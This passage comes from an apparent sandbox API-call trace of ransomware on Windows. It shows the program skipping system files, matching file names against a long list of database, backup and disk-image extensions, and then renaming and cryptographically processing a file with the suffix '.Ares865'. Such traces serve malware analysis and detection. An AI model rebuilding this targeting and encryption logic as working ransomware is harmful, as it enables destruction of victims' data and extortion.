ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="aoldtz.exe") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="..") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="windows") returned -1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="bootmgr") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="temp") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="pagefile.sys") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="boot") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="ids.txt") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="ntuser.dat") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="perflogs") returned 1 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2="MSBuild") returned 1 [0085.302] lstrlenW (lpString="usertile38.bmp") returned 14 [0085.302] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 82 [0085.302] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile38.bmp" | out: lpString1="usertile38.bmp") returned="usertile38.bmp" [0085.302] lstrlenW (lpString="usertile38.bmp") returned 14 [0085.302] lstrlenW (lpString="Ares865") returned 7 [0085.302] lstrcmpiW (lpString1="e38.bmp", lpString2="Ares865") returned 1 [0085.302] lstrlenW (lpString=".dll") returned 4 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".dll") returned 1 [0085.302] lstrlenW (lpString=".lnk") returned 4 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".lnk") returned 1 [0085.302] lstrlenW (lpString=".ini") returned 4 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".ini") returned 1 [0085.302] lstrlenW (lpString=".sys") returned 4 [0085.302] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".sys") returned 1 [0085.302] lstrlenW (lpString="usertile38.bmp") returned 14 [0085.303] lstrlenW (lpString="bak") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.303] lstrlenW (lpString="ba_") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.303] lstrlenW (lpString="dbb") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.303] lstrlenW (lpString="vmdk") returned 4 [0085.303] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.303] lstrlenW (lpString="rar") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.303] lstrlenW (lpString="zip") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.303] lstrlenW (lpString="tgz") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.303] lstrlenW (lpString="vbox") returned 4 [0085.303] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.303] lstrlenW (lpString="vdi") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.303] lstrlenW (lpString="vhd") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.303] lstrlenW (lpString="vhdx") returned 4 [0085.303] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.303] lstrlenW (lpString="avhd") returned 4 [0085.303] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.303] lstrlenW (lpString="db") returned 2 [0085.303] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.303] lstrlenW (lpString="db2") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.303] lstrlenW (lpString="db3") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.303] lstrlenW (lpString="dbf") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.303] lstrlenW (lpString="mdf") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.303] lstrlenW (lpString="mdb") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.303] lstrlenW (lpString="sql") returned 3 [0085.303] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.304] lstrlenW (lpString="sqlite") returned 6 [0085.304] lstrcmpiW (lpString1="38.bmp", lpString2="sqlite") returned -1 [0085.304] lstrlenW (lpString="sqlite3") returned 7 [0085.304] lstrcmpiW (lpString1="e38.bmp", lpString2="sqlite3") returned -1 [0085.304] lstrlenW (lpString="sqlitedb") returned 8 [0085.304] lstrcmpiW (lpString1="le38.bmp", lpString2="sqlitedb") returned -1 [0085.304] lstrlenW (lpString="xml") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.304] lstrlenW (lpString="$er") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.304] lstrlenW (lpString="4dd") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.304] lstrlenW (lpString="4dl") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.304] lstrlenW (lpString="^^^") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.304] lstrlenW (lpString="abs") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.304] lstrlenW (lpString="abx") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.304] lstrlenW (lpString="accdb") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accdb") returned -1 [0085.304] lstrlenW (lpString="accdc") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accdc") returned -1 [0085.304] lstrlenW (lpString="accde") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accde") returned -1 [0085.304] lstrlenW (lpString="accdr") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accdr") returned -1 [0085.304] lstrlenW (lpString="accdt") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accdt") returned -1 [0085.304] lstrlenW (lpString="accdw") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accdw") returned -1 [0085.304] lstrlenW (lpString="accft") returned 5 [0085.304] lstrcmpiW (lpString1="8.bmp", lpString2="accft") returned -1 [0085.304] lstrlenW (lpString="adb") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.304] lstrlenW (lpString="adb") returned 3 [0085.304] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.305] lstrlenW (lpString="ade") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.305] lstrlenW (lpString="adf") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.305] lstrlenW (lpString="adn") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.305] lstrlenW (lpString="adp") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.305] lstrlenW (lpString="alf") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.305] lstrlenW (lpString="ask") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.305] lstrlenW (lpString="btr") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.305] lstrlenW (lpString="cat") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.305] lstrlenW (lpString="cdb") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.305] lstrlenW (lpString="ckp") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.305] lstrlenW (lpString="cma") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.305] lstrlenW (lpString="cpd") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.305] lstrlenW (lpString="dacpac") returned 6 [0085.305] lstrcmpiW (lpString1="38.bmp", lpString2="dacpac") returned -1 [0085.305] lstrlenW (lpString="dad") returned 3 [0085.305] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.305] lstrlenW (lpString="dadiagrams") returned 10 [0085.305] lstrcmpiW (lpString1="tile38.bmp", lpString2="dadiagrams") returned 1 [0085.305] lstrlenW (lpString="daschema") returned 8 [0085.305] lstrcmpiW (lpString1="le38.bmp", lpString2="daschema") returned 1 [0085.305] lstrlenW (lpString="db-journal") returned 10 [0085.305] lstrcmpiW (lpString1="tile38.bmp", lpString2="db-journal") returned 1 [0085.305] lstrlenW (lpString="db-shm") returned 6 [0085.305] lstrcmpiW (lpString1="38.bmp", lpString2="db-shm") returned -1 [0085.305] lstrlenW (lpString="db-wal") returned 6 [0085.306] lstrcmpiW (lpString1="38.bmp", lpString2="db-wal") returned -1 [0085.306] lstrlenW (lpString="dbc") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.306] lstrlenW (lpString="dbs") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.306] lstrlenW (lpString="dbt") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.306] lstrlenW (lpString="dbv") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.306] lstrlenW (lpString="dbx") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.306] lstrlenW (lpString="dcb") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.306] lstrlenW (lpString="dct") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.306] lstrlenW (lpString="dcx") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.306] lstrlenW (lpString="ddl") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.306] lstrlenW (lpString="dlis") returned 4 [0085.306] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.306] lstrlenW (lpString="dp1") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.306] lstrlenW (lpString="dqy") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.306] lstrlenW (lpString="dsk") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.306] lstrlenW (lpString="dsn") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.306] lstrlenW (lpString="dtsx") returned 4 [0085.306] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.306] lstrlenW (lpString="dxl") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.306] lstrlenW (lpString="eco") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.306] lstrlenW (lpString="ecx") returned 3 [0085.306] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.306] lstrlenW (lpString="edb") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.307] lstrlenW (lpString="epim") returned 4 [0085.307] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.307] lstrlenW (lpString="fcd") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.307] lstrlenW (lpString="fdb") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.307] lstrlenW (lpString="fic") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.307] lstrlenW (lpString="flexolibrary") returned 12 [0085.307] lstrcmpiW (lpString1="ertile38.bmp", lpString2="flexolibrary") returned -1 [0085.307] lstrlenW (lpString="fm5") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.307] lstrlenW (lpString="fmp") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.307] lstrlenW (lpString="fmp12") returned 5 [0085.307] lstrcmpiW (lpString1="8.bmp", lpString2="fmp12") returned -1 [0085.307] lstrlenW (lpString="fmpsl") returned 5 [0085.307] lstrcmpiW (lpString1="8.bmp", lpString2="fmpsl") returned -1 [0085.307] lstrlenW (lpString="fol") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.307] lstrlenW (lpString="fp3") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.307] lstrlenW (lpString="fp4") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.307] lstrlenW (lpString="fp5") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.307] lstrlenW (lpString="fp7") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.307] lstrlenW (lpString="fpt") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.307] lstrlenW (lpString="frm") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.307] lstrlenW (lpString="gdb") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.307] lstrlenW (lpString="gdb") returned 3 [0085.307] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.307] lstrlenW (lpString="grdb") returned 4 [0085.308] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.308] lstrlenW (lpString="gwi") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.308] lstrlenW (lpString="hdb") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.308] lstrlenW (lpString="his") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.308] lstrlenW (lpString="ib") returned 2 [0085.308] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.308] lstrlenW (lpString="idb") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.308] lstrlenW (lpString="ihx") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.308] lstrlenW (lpString="itdb") returned 4 [0085.308] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.308] lstrlenW (lpString="itw") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.308] lstrlenW (lpString="jet") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.308] lstrlenW (lpString="jtx") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.308] lstrlenW (lpString="kdb") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.308] lstrlenW (lpString="kexi") returned 4 [0085.308] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.308] lstrlenW (lpString="kexic") returned 5 [0085.308] lstrcmpiW (lpString1="8.bmp", lpString2="kexic") returned -1 [0085.308] lstrlenW (lpString="kexis") returned 5 [0085.308] lstrcmpiW (lpString1="8.bmp", lpString2="kexis") returned -1 [0085.308] lstrlenW (lpString="lgc") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.308] lstrlenW (lpString="lwx") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.308] lstrlenW (lpString="maf") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.308] lstrlenW (lpString="maq") returned 3 [0085.308] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.309] lstrlenW (lpString="mar") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.309] lstrlenW (lpString="marshal") returned 7 [0085.309] lstrcmpiW (lpString1="e38.bmp", lpString2="marshal") returned -1 [0085.309] lstrlenW (lpString="mas") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.309] lstrlenW (lpString="mav") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.309] lstrlenW (lpString="maw") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.309] lstrlenW (lpString="mdbhtml") returned 7 [0085.309] lstrcmpiW (lpString1="e38.bmp", lpString2="mdbhtml") returned -1 [0085.309] lstrlenW (lpString="mdn") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.309] lstrlenW (lpString="mdt") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.309] lstrlenW (lpString="mfd") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.309] lstrlenW (lpString="mpd") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.309] lstrlenW (lpString="mrg") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.309] lstrlenW (lpString="mud") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.309] lstrlenW (lpString="mwb") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.309] lstrlenW (lpString="myd") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.309] lstrlenW (lpString="ndf") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.309] lstrlenW (lpString="nnt") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.309] lstrlenW (lpString="nrmlib") returned 6 [0085.309] lstrcmpiW (lpString1="38.bmp", lpString2="nrmlib") returned -1 [0085.309] lstrlenW (lpString="ns2") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.309] lstrlenW (lpString="ns3") returned 3 [0085.309] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.310] lstrlenW (lpString="ns4") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.310] lstrlenW (lpString="nsf") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.310] lstrlenW (lpString="nv") returned 2 [0085.310] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.310] lstrlenW (lpString="nv2") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.310] lstrlenW (lpString="nwdb") returned 4 [0085.310] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.310] lstrlenW (lpString="nyf") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.310] lstrlenW (lpString="odb") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.310] lstrlenW (lpString="odb") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.310] lstrlenW (lpString="oqy") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.310] lstrlenW (lpString="ora") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.310] lstrlenW (lpString="orx") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.310] lstrlenW (lpString="owc") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.310] lstrlenW (lpString="p96") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.310] lstrlenW (lpString="p97") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.310] lstrlenW (lpString="pan") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.310] lstrlenW (lpString="pdb") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.310] lstrlenW (lpString="pdm") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.310] lstrlenW (lpString="pnz") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.310] lstrlenW (lpString="qry") returned 3 [0085.310] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.311] lstrlenW (lpString="qvd") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.311] lstrlenW (lpString="rbf") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.311] lstrlenW (lpString="rctd") returned 4 [0085.311] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.311] lstrlenW (lpString="rod") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.311] lstrlenW (lpString="rodx") returned 4 [0085.311] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.311] lstrlenW (lpString="rpd") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.311] lstrlenW (lpString="rsd") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.311] lstrlenW (lpString="sas7bdat") returned 8 [0085.311] lstrcmpiW (lpString1="le38.bmp", lpString2="sas7bdat") returned -1 [0085.311] lstrlenW (lpString="sbf") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.311] lstrlenW (lpString="scx") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.311] lstrlenW (lpString="sdb") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.311] lstrlenW (lpString="sdc") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.311] lstrlenW (lpString="sdf") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.311] lstrlenW (lpString="sis") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.311] lstrlenW (lpString="spq") returned 3 [0085.311] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.311] lstrlenW (lpString="te") returned 2 [0085.311] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.311] lstrlenW (lpString="teacher") returned 7 [0085.311] lstrcmpiW (lpString1="e38.bmp", lpString2="teacher") returned -1 [0085.312] lstrlenW (lpString="tmd") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.312] lstrlenW (lpString="tps") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.312] lstrlenW (lpString="trc") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.312] lstrlenW (lpString="trc") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.312] lstrlenW (lpString="trm") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.312] lstrlenW (lpString="udb") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.312] lstrlenW (lpString="udl") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.312] lstrlenW (lpString="usr") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.312] lstrlenW (lpString="v12") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.312] lstrlenW (lpString="vis") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.312] lstrlenW (lpString="vpd") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.312] lstrlenW (lpString="vvv") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.312] lstrlenW (lpString="wdb") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.312] lstrlenW (lpString="wmdb") returned 4 [0085.312] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.312] lstrlenW (lpString="wrk") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.312] lstrlenW (lpString="xdb") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.312] lstrlenW (lpString="xld") returned 3 [0085.312] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.312] lstrlenW (lpString="xmlff") returned 5 [0085.312] lstrcmpiW (lpString1="8.bmp", lpString2="xmlff") returned -1 [0085.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.Ares865") returned 90 [0085.313] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.ares865"), dwFlags=0x1) returned 1 [0085.314] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.315] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.315] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.315] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.315] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.317] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.320] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.320] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.320] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.320] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.320] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.320] RtlAllocateHeap 